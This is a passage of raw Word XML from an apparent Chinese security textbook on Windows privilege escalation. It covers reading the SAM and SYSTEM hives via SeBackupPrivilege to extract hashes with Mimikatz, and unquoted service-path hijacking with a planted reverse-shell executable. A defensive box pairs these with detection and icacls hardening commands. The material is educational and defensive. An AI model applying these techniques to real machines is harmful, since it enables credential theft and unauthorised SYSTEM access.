        <w:t xml:space="preserve">SeBackupPrivilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的账户，攻击者可以读取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\System32\Config\SAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件，这些文件存储了本地账户的密码哈希，随后可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mimikatz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等工具离线破解或直接提取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NTLM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">哈希。这就将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的权限问题直接转化为了本书第13章所述的哈希破解问题①。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="288"/>
    <w:bookmarkStart w:id="292" w:name="常见服务配置错误导致的提权"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">常见服务配置错误导致的提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">理解令牌机制后，我们可以进一步分析具体的配置错误。攻击者获得低权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，总是会进行自动或手动的枚举，以寻找因配置不当而留出的提权路径②。其中，Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务的配置错误是最常见且最基本的一类。服务是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中长期在后台运行的进程，它们通常在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">账户下运行，但如果其配置存在弱点，攻击者就可以劫持它们并在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上下文中执行任意代码。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="289" w:name="不带引号的服务路径unquoted-service-path③"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不带引号的服务路径（Unquoted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Service </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Path）③</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务配置中最经典的逻辑错误之一，其产生的根本原因是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的命令行解析机制与文件路径命名规范之间的交互缺陷①。当一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务被设置为自动启动，且其执行文件的二进制路径（Binary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Name）包含空格且未被引号括起时，Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务控制管理器（SCM，Service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Control </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Manager）在解析该路径时，会按照“遇到第一个空格则尝试在该位置寻找可执行文件”的规则逐步试探。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">例如，一个服务的配置文件可能被写为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Program Files\My App\app.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。由于没有引号，当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SCM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启动该服务时，它会依次尝试执行以下文件：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Program.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Program Files\My.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Program Files\My App\app.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果攻击者在低权限下对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Program Files\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录拥有写权限（这通常意味着系统的软件安装目录权限已被灾难性地错误配置），就可以将一个精心构造的恶意可执行文件（如反向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell）命名为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Program.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">My.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并放入相应位置。当服务再次启动（无论是系统重启还是手动触发），SCM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">就会以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限执行该攻击者的恶意文件，从而导致提权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是一个典型的“环境依赖”型漏洞（②）：攻击者能否利用成功，取决于三个条件的结合：（1）存在一个自动运行或可被普通用户重启的、且路径不带引号的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务；（2）普通用户对该服务路径的中间目录具有写入权限；（3）Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统本身不会修复这种由第三方软件导致的路径书写不规范。这是一个纯粹的逻辑配置问题，不涉及任何内存破坏，因此也极具教学价值——它体现了攻击者如何利用系统运行逻辑中的“理解偏差”来获取非法权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：蓝队检测与修复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令枚举</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：防御者应在定期安全审计中，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内置命令扫描所有服务的配置。命令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wmic service get name,displayname,pathname,startmode,startname 2&gt;nul | findstr /i /v "C:\Windows"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以列出所有非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内置的服务及它们的路径。重点检查路径中包含空格且没有被双引号包裹的条目，并核实这些路径所在目录的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACL（访问控制列表），确保</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authenticated Users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或低权限组没有写入（Write）或修改（Modify）权限②。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">文件完整性监控（FIM，File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Integrity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在关键系统目录（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Program Files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根目录）部署文件审计（SACL），监控所有新创建的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.dll</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件。任何在预期应用安装程序之外的可执行文件创建事件都应触发高优先级告警，并关联到具体用户账户。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">主机入侵检测系统（HIDS）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：HIDS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则应包含对“非标准路径的可执行文件被以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份启动”这一行为的监控。例如，进程创建日志（Event</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4688）可以作为日志源，检测规则可以设立为：当父进程是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">services.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（SCM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程）但子进程路径不符合标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Program Files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">子目录规范时告警。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复与加固</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复服务路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：立即使用注册表编辑器（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">regedit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）定位到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&lt;服务名&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ImagePath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">项的值用双引号括起，例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"C:\Program Files\My App\app.exe"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目录权限加固（最根本的措施）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：立即收回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Program Files\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根目录下任何允许普通用户或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authenticated Users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">写入的不安全</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACL。使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">icacls "&lt;DIR&gt;" /reset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">icacls "&lt;DIR&gt;" /inheritance:r /grant "NT AUTHORITY\SYSTEM:(OI)(CI)F" /grant "BUILTIN\Administrators:(OI)(CI)F"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重置为严格继承的默认权限②。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限原则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：确保所有自定义安装的第三方应用程序被安装在受保护的程序目录下，而非磁盘根目录。软件开发者在写服务安装器时，必须始终将路径用引号括起，这是一项基本的安全编码规范。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="289"/>
    <w:bookmarkStart w:id="290" w:name="弱服务权限weak-service-permissions③"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">弱服务权限（Weak</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Service </w:t>
